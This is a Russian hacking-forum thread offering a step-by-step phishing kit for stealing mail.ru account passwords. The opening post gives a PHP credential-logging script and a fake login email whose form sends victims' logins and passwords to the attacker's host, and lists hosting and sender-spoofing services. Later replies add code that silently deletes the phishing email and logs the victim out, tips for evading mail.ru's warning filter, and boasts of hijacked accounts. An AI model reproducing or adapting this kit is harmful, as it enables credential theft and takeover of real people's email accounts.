PDA

Просмотр полной версии : Взлом почты на mail.ru [СИ]


Chaak
06.06.2008, 20:12
[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ;)", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
km.ru
nextmail.ru
hobby.ru
webrise.ru
lapin.ru
free.dl-hosting.ru
hostow.net
beplaced.ru
777host.ru
paltus.ru
miraclehost.ru
freebox.ru
alfaspace.net
k70.ru
hosting.promostudio.ru
chat.ru
maxhost.ru
nixup.com
e2e.ru
noka.ru
newmail.ru
boom.ru
h15.ru
hut.ru
jino-net.ru
pochta.ru
unlimhost.ru
onepage.ru
by.ru
sbn.bz
yard.ru
domainhosting.ru
orthodoxy.ru
webservis.ru
ru-web.net
activehost.ru
househost.ru
bestof.ru
addr.ru
hosting.dump.ru
pesni.ru
medbox.ru
fatal.ru
x5x.ru
hopshot.com
5gigs.com
wagoo.com
orgfree.com
awardspace.com
bobos.ca
www.host.sk
zportal.info
spaceall.de
3x.ro
sretenie.ru
dotgeek.org
sevhosting.net
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru
chat.ru
boom.ru
by.ru


Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Рассмотрим скрипт поподробнее:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
Сохраним в файл mes.php и зальем на хостинг. Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>
Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
http://www.svkadr.ru/vr/conf/index.php?mail=1
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!

sabe
06.06.2008, 20:17
видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)

satana8920
06.06.2008, 21:27
в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка

[:|||||:]
06.06.2008, 21:39
А как же это?
http://i.piccy.kiev.ua/i2/c1/24/afa5fd6e684c59983d045defdb59.jpeg

satana8920
06.06.2008, 22:19
У меня такого ни разу не повлялось!
это можно обойти изменив буквы в словах!
так дополняй скорее свою статью
:(

ufoPlast
07.06.2008, 04:47
ерунда.. даже на ачате такихже статей куча.... ненадо было писать)
Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
Я считаю не нужно отбивать у людей желание писать, хоть что то...

m9chik
07.06.2008, 08:04
Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.

slider
07.06.2008, 10:41
Предложите что-нибудь лучше, кроме брута и протроянивания.
XSS или XSS + ФЕЙК ...

Zitt
07.06.2008, 15:32
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

byblik
07.06.2008, 15:52
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
А я соглашусь с ufoPlast, все он правильно сказал.

Lucky_Student
07.06.2008, 16:19
ИМХО, СИ легче юзать на Яндексе.
Поясню:
- Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
- Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд

Вообщем мну предпочитает яндекс. :)
Хотя мэйл тоже слабо защищен...

cb93ka
29.07.2008, 22:37
Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд
а что мешает "анонимно" послать мыло от admin@yandex.ru ?

Ponchik
02.08.2008, 16:34
Тема немного старовата, но я вставлю свои 5 копеек :)
1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...

Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
это перенесёт письмо в корзину, потом вызываем
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
Это спросит хотимли мы удалить навсегда письмо?
Дальше вот такая форма
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
<title>x3k</title>
</head>
<body onload="pe4enkiiiii.submit()">
<form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii">
<input type="hidden" name="confirm" value="on">
<input type="hidden" name="remove" value="1">
<input type="hidden" name="id" value="messid">
</form>
</body>
</html>
Это сносит письмо насмерть :D
Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним :)

Не тестировал, токо частично, должно работать... :)
Протестировал, работает :D
=============
ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно :D

deniska1517
02.08.2008, 18:12
молодец, уделил время, написал. ну, что - + вообщем

Ponchik
02.08.2008, 19:47
Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия :)

В скрипте 5 файлов
index.php - скрипт, записывающий инфу в логи
frame.php - скрипт, удаляющий письмо
log.txt - подробный лог
minilog.txt - пишется мыло и пасс
readme.html - инструкция с HTML кодом который надо отсылать

В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер :)

Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу :D
Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? :cool:
:D
P.S> Впервые этим занимаюсь и просто от нечего делать :)
=========
Гы гы, чел в аське повёлся :D Мля, а это работает оказывается :)))
Кстате в .htaccess пропишите
<files "log.txt">
order allow,deny
deny from all
</files>
<files "minilog.txt">
order allow,deny
deny from all
</files>
Ато не кайф если логи прочитают

Kusto
02.08.2008, 21:08
понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))

Ponchik
02.08.2008, 22:34
Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда
=====================
Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо

<h1>Ты грязный овце*б :D </h1>
<img src="http://win.mail.ru/cgi-bin/logout">

Такое западло :) Но можно будет удалить письмо из списка :(

lmns
12.08.2008, 23:01
Пару слов скажу.
1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?

iron-viper
13.08.2008, 15:26
Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

MRAK9
13.08.2008, 17:05
Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

iron-viper
13.08.2008, 19:42
Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

за старания держи +1 конечно, но написал боле интереснее функцию


function send_mail($To, $From, $Text, $Subject){
$message = "";

$Text = str_replace("\n", '<Br/>', $Text);
$headers = "From: ".$From."\n";
$headers .= "X-Mailer: PHP4\n";
$headers .= "X-Priority: 3\n";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-Type: multipart/alternative; boundary=\"==MIME_BOUNDRY_alt_main_message\"\n\n";
$message .= "--==MIME_BOUNDRY_alt_main_message\n";
$message .= "Content-Type: text/plain; charset=windows-1251\n";
$message .= "Content-Transfer-Encoding: 7bit\n\n";
$message .= $Text . "\n\n";
$message .= "--==MIME_BOUNDRY_alt_main_message\n";
$message .= "Content-Type: text/html; charset=windows-1251\n";
$message .= "Content-Transfer-Encoding: 7bit\n\n";
$message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
$message .= "<HTML><BODY>\n";
$message .= $Text . "\n";
$message .= "</BODY></HTML>\n\n";
$message .= "--==MIME_BOUNDRY_alt_main_message--\n";
return mail($To, $Subject, $message, $headers);
}

DIMON4G
28.08.2008, 14:58
Я отправляю из отбук экспресс и нет почему-то хтмл кода, тока тхт, помогите, вот код который я пытаюсь отправить:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="POST" action="http://mail-m.freehostia.com/index.php">
<tr>
<td width=75>
<img src="http://mail-m.freehostia.com/readsniffer.png" height=1><img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="login">
</td>
<td width=75>
<select name="domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type=checkbox value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>

Alekzzzander
13.09.2008, 19:14
ссылка для анонимной отправки почты не работает, подскажите как их отправлять анонимно, со вставкой html кода (желательно скрипт)

Rejjin
13.09.2008, 20:39
и если мона то опишите как отправить уже обработанною

lmns
14.09.2008, 16:45
Alekzzzander держи скрипт http://webfile.ru/2230234

Alek$$$
31.10.2008, 18:09
можете кто нить скрипты выложить(которые на хостинг надо заливать?

Alexandr II
31.10.2008, 21:59
можете кто нить скрипты выложить(которые на хостинг надо заливать?
_http://webfile.ru/2351393
там четыре фейка, майл.ру, яндекс, юкоз и рамблер ;)

xryst85
08.11.2008, 22:15
Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда


Перевыложи пожалуйста архив со скриптами, очень надо!

Alek$$$
08.11.2008, 22:31
Да, перезалейте плиз. И подскажите хостинг платный, но не очень дорогой для этих целей.

Ponchik
09.11.2008, 17:18
http://slil.ru/26316711

xryst85
09.11.2008, 20:50
Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?

k0lbasa
09.11.2008, 20:54
Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?
расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата

xryst85
09.11.2008, 22:12
насчет скрипта тут гдето в этой теме видел, но адрес он там не подменяет.

Alek$$$
09.11.2008, 23:59
Я Crazy mail юзаю

xryst85
10.11.2008, 01:17
дай ссылку где дернуть его мона, желательно с мануалом!

warlok
10.11.2008, 01:21
Вот крейзи мейл , но сейчас помойму их бесплатный серв если и работает то редко.
_http://depositfiles.com/ru/files/3394597

binarnik
10.11.2008, 15:42
расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата
iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?

warlok
10.11.2008, 22:17
iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?
перезайлете куданить например на дамп а то оттуда некачает.

binarnik
11.11.2008, 00:58
перезайлете куданить например на дамп а то оттуда некачает.
раз http://webfile.ru/2379569
дваз http://www.mediafire.com/?yenwmttnmty

warlok
11.11.2008, 01:28
а нету у кого нить для отправки писем в html ? а то тот скрипт что в посте выше отправляет в txt.

binarnik
11.11.2008, 02:22
o_0 как это? скрипт 100% рабочий, мб ты что-то неправильно делаешь, пиши что и как.

warlok
11.11.2008, 02:44
o_0 как это? скрипт 100% рабочий, мб ты что-то неправильно делаешь, пиши что и как.
Залил я скрипт на хост ( freehostia.net ) , зашол по урлу заполнил необходимые поля и поле где надо ввести текст сообшения ввел немного переделаный мной варант чака , отправил на ukr.net и мне пришло письмо не в хтмл а обычном текством варианте :)
И что тут может быть неправильно то?)

binarnik
11.11.2008, 02:56
ммм) шайтанама) у хруста тоже работает и у меня работает)
мб ты в своем письме добавил <html><head><body>?

warlok
11.11.2008, 03:09
нет ничего такого недобовлял :(

binarnik
11.11.2008, 23:27
скрипт работает опробовать можно тут
http://goob.coolpage.biz/mail.php
тут лежит исходник качать при помощи менеджера закачек
http://goob.coolpage.biz/mail.rar

xryst85
11.11.2008, 23:51
отправил себе на почту но нефига непришло! :(
В чем может быть дело?

den1skA
12.11.2008, 00:30
мммм... чак зачот. Статейка на 10 баллов :) Жаль репу ставить немогу)

binarnik
12.11.2008, 00:43
отправил себе на почту но нефига непришло! :(
В чем может быть дело?
используй это
http://forum.antichat.ru/showpost.php?p=938825&postcount=48
кажется тот скрипт что я выложил ранее работает с какими то глюками то сообщение в txt отправит то вообще не отправит )

xryst85
12.11.2008, 15:29
http://goob.coolpage.biz/mail.php с этого и отправлял, нефига не пришло!!!

binarnik
12.11.2008, 21:09
ну тут настоятельно рекомендую пропатчить руки... еще есть возможно сть напсиать варлоку в пм у него мой скрипт работает

k0lbasa
12.11.2008, 21:17
http://downloadportal.ru/email.php
вот на скрипт наткнулся, хороший

GlOFF
12.11.2008, 23:13
http://downloadportal.ru/email.php
вот на скрипт наткнулся, хороший
Да таких много штучек, есть и прожки локально на компе отсылать...

xryst85
13.11.2008, 15:03
А подскажи что это за проги, их названия или выложи куданибудь!

StopFreeLife
13.11.2008, 15:47
http://downloadportal.ru/email.php - это скрипт анонимной отправки с любого адреса,примером я напишу тебе на почту сообщение с адреса Admin@antichat.ru. На сайте он уже рабочий и просто вбивай что надо и все :)

xryst85
13.11.2008, 18:22
У меня с http://downloadportal.ru/email.php простой текст приходит, но когда пытаюсь прислать html код нефига не приходит, уже и <html> <head></head> </html> добовлял нефига неприходит, вот адрес тестовый на майл ру xryst13@mail.ru пришлите код тот что сдесь и расскажите как это сделать!

>.:!FrE!:.<
04.12.2008, 16:38
']А как же это?
http://i.piccy.kiev.ua/i2/c1/24/afa5fd6e684c59983d045defdb59.jpeg

Это обходится в пару тегов...

Bl1ZzArD
04.12.2008, 18:55
там же написана тебе что это опасный таг, ты наверное отправил <script

xryst85
04.12.2008, 19:02
Да, а как надо тогда, подскажи можно в ЛС

DIMON4G
05.12.2008, 23:54
чё подсказывать? это уже старый способ, лучше покупай у кого нить xss и ломай мыла )))

More Insane?
19.12.2008, 21:47
Метод хоть и довольно примитивный, но автор молодец, конструктивно написал.

F1shka
24.12.2008, 09:53
Предложите что-нибудь лучше, кроме брута и протроянивания.
Лучшее оружие вора - это ум. Я то думал тут одна СИ. СИ в нете это очень уж тяжко. В реальной жизни на аппонента можно воздействовать жестами\голосом\поведением \другими людьми\нлп. Ну крестик)

VITАL
26.01.2009, 08:05
http://downloadportal.ru/email.php переделал скрипт, терь хтмл походу пашет

k0lbasa
26.01.2009, 12:31
http://downloadportal.ru/email.php переделал скрипт, терь хтмл походу пашет
http://email.rl6.ru/
лучше поставь этот скрипт)

Gedj
26.01.2009, 13:08
продам хсс)))

GTO
02.02.2009, 20:15
взломал мыло какогото админчеГа :) все его сайты которые были зареганы на мыло мои :))

MaTpOc
09.02.2009, 20:30
У меня почему то письмо не приходит!

A1exx
09.02.2009, 20:33
GTO pliz подскажи как ломанул??и чем?

GOPPA
11.02.2009, 12:54
У меня почему то письмо не приходит!
У меня тож...что не так?

MaTpOc
11.02.2009, 23:11
Хм ... письмо пришло спустя 2 дня, после ввода паса и лога ниче на хост не пришло!

playhard.g0pr0
16.02.2009, 21:08
взломал мыло админа чата на августе)

LEE_ROY
19.02.2009, 02:31
залейте плз скрипты, ссылки все мертвые. +++)

halt
17.03.2009, 08:52
Кто-нибудь знает, как убить javascript-окно, которое вылазит при отправке данных из формы?

xForgan
18.03.2009, 19:10
перезалейте ссылки плиииз!!!!!!!!!!!!!

MaTpOc
08.04.2009, 19:37
на каком халявном хосте можно положить пхп скрипты?

sergeich
10.04.2009, 15:58
Рабочая ссылка на закачку скриптов от Ponchik'а:

mail.ru_v2.rar 4.56KB (http://slil.ru/26316711)

sialla
16.04.2009, 17:31
Архивчик-то... запаролен :mad: что делать?

-=$MiRoN$=-
19.04.2009, 02:26
У когось получилось?

Гота
22.10.2009, 20:53
Расскажите поподробнее про сниффер. Что конкретно с ним делать

Что писать вместо строк "файл куда сохранять", логин и домен (чей?) и чей пароль? Надо ли что-то менять в последеней строке "куда мы будем перенаправлять пользователя после авторизации на письме-фейке."?

<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>


Надо сломать маил.ру одной дуры

Validol
23.10.2009, 02:52
1. Регистрируемся на хостинге с поддержкой PHP -
http://google.ru/search?q=бесплатный хостинг с поддержкой php
2. Создаем файл, под названием mes.php и создаем файл mail.txt (chmod 777)
3. Вставляем в него этот код:

<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
4. Копируем через ftp-протокол на созданный хостинг эти 2 файла.
5. Отправляем жертве на электронную почту письмо, код которого распложен в первом посте данного топика.
6. Проверяем файл mail.txt

Если и сейчас не понятно - то советую взять скорее в руки учебники по экономике или что там в 10-11 классе сейчас проходят..?

Гота
23.10.2009, 13:59
Я спрашивала про другое, нужно ли что-то менять в самом коде или копировать прям так, с русскими словами "логин" "пароль". С остальным я так знаю.

Validol
23.10.2009, 16:10
Прям так копировать.
Код предназначен для записи логина и пароля с mail.ru.



fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль

это комментарии... :rolleyes:

Гота
23.10.2009, 23:28
Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?

Torentte
12.01.2010, 00:50
Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?
Отправь таким способом на другой свой емейл и посмотри как будет выглядеть...

Mr.Replica
12.01.2010, 00:56
у меня есть мыльник на маиле спец.для СИ. если чё,пиши в личку

oldsys
21.01.2010, 12:18
Вот почему не надо читать письма от незнакомых людей ! =)

Babkin
24.01.2010, 13:12
Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.

Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:

Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.

Как я понял вся беда в сниффере:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.

Разумеется в файле моем комментариев нет.

lmns
24.01.2010, 15:14
Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.

Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:

Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.

Как я понял вся беда в сниффере:

А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.

Разумеется в файле моем комментариев нет.
Не в сниффере, а в письме которое посылаешь. Скрипт майла реагирует так на слово пароль.

Babkin
24.01.2010, 15:28
Хм, и как тогда обойти сие?

DRONING
24.01.2010, 16:49
если правда реагирует на силово пароль то попробуй написать слово пароль так: пa(латинская)роль

Babkin
24.01.2010, 18:09
не прокатило =( вероятно все дело в самих командах.

Kusto
24.01.2010, 18:16
не прокатило =( вероятно все дело в самих командах.
все дело в редиректе, у тебя указывет что ссылка ведет на внешний сайт(в твоем случае фейк), а надо так ссылка на майл- редирект на фейк (каждый использует лично свои редиректы и выкладывать их здесь наврядли будут- т к майл быстро все это дело фиксет)

lmns
24.01.2010, 19:46
не прокатило =( вероятно все дело в самих командах.
И это всё? сдался? Может кто-нибудь попробует подумать?
Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.

Babkin
17.02.2010, 19:36
И это всё? сдался? Может кто-нибудь попробует подумать?
Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.

Месяц посвятил этому. Слово "пароль" убрал. Не помогло.

lmns
22.02.2010, 12:23
Babkin скинь в PM письмо которое посылаешь.

hijack24
19.03.2010, 16:02
перезалейте архив плз!!!
для отправки письма с подменой адреса советую bogomol.net/incom/

DSL@
30.03.2010, 00:23
перезалейте архив плз!!!
для отправки письма с подменой адреса советую bogomol.net/incom/
я угораю эта статья была в 2008 пиши в ПМ челу может дает если сидит тут досихпор

TreV@N
06.04.2010, 07:20
Перезалейте скрипт от Ponchik'а!!!

Byte_
06.04.2010, 10:07
Помнится была ещё тема с открытками. Там когда хотим посмотреть открытку переадресует на страницу с логином/паролем. Соответственно подменяем эту страницу на свою.

Кстати проверка на урл сайта куда идёт переход с формы в письме проверяется яваскриптом под телом письма и должен содержать "mail.ru". я так понимаю, если забить домен mail.ru.anydomen.ru, то прокатит и этот фейк.

Кстати следует задуматься над тем, что не обязательно вообще регить какой бы то не было хостинг, нужно реализовать отправку сообщения внутри mail.ru. Это явно поможет обойти защиту.

Только вот как это сделать я пока слабо представляю, хотя мысли есть.

Eff0rd
06.04.2010, 11:52
хорошая статья, а прочитал только сегодня. Когда научусь делать что то лучше других - напишу статью тоже!

Zigert
06.04.2010, 18:45
да,не плохо все расписано

stuf
16.04.2010, 18:52
а если у меня нету денег на платный хост?
что посоветуешь?)

Sated
16.04.2010, 19:21
найти деньги и купить)

stuf
17.04.2010, 08:34
найти деньги и купить)

на стройку)xD

другого ответа и не думал услышить.
